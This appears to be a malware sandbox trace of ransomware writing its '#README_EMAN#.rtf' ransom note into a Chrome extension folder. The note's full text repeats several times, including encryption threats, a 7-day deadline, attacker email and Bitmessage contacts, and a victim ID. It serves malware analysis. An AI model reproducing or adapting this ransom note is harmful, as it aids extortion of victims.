\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\np¬WøÖ37\x1c\rx\x0b\x80¯5\x8c\x9cû)'\x9cý\x0e\x0f3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0286.500] WriteFile (in: hFile=0x2f0, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.528] CloseHandle (hObject=0x2f0) returned 1 [0286.553] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0286.554] GetLastError () returned 0x2 [0286.554] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.560] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.560] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.560] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 